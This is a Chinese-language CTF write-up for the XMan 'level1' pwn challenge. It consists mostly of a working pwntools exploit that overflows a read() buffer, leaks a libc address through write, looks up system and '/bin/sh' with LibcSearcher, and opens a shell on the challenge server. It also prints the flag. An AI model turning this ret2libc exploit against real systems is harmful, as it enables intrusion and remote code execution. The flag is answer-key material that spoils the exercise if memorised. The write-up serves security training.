CTF – XMan – level1 - LibcSearcher

题目说明

题目来源: XMan

题目: level1

read() 栈溢出 ROP 无libc ret2libc 重复调用
之前写过Jarvisoj平台上的level1,是比较简单的利用,这篇是攻防世界的level1,程序的逻辑有一些变化

解题步骤

攻防世界给出的level1和Jarvisoj平台上在文件类型、安全机制和程序结构都一样
但是在nc连接上去之后发现程序的顺序发生了一些变化

原本的vulerable_function()函数结构是这样

但是在当nc连接上去时程序返回是这样的

也就是先read()再printf()

那就只能使用level3的解法了

写出exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *
from LibcSearcher import *

p = remote('111.198.29.45','39980')
e = ELF('./level1')

plt_write = e.plt['write']
got_write = e.got['write']
vule_addr = e.symbols['vulnerable_function']

payload1 = 'A'*0x88 + 'A'*0x4 + p32(plt_write) + p32(vule_addr) + p32(0x1) + p32(got_write) + p32(0x4)
p.send(payload1)

write_addr = u32(p.recv(4))
print("write addr - "+hex(write_addr))

libc = LibcSearcher('write',write_addr)
write_off = libc.dump('write')
bin_sh_off = libc.dump('str_bin_sh')
system_off = libc.dump('system')
exit_off = libc.dump('exit')

libc_base = write_addr - write_off

system_addr = libc_base + system_off
bin_sh_addr = libc_base + bin_sh_off
exit_addr = libc_base + exit_off
print("system addr - "+hex(system_addr))
print("bin_sh addr - "+hex(bin_sh_addr))
print("exit addr - "+hex(exit_addr))

sleep(2)

payload2 = 'A'*0x88 + 'A'*0x4 + p32(system_addr) + p32(exit_addr) + p32(bin_sh_addr)
p.send(payload2)

p.interactive()

运行得到flag

flag:

1
cyberpeace{915f1367485a073a30946bf221a6af61}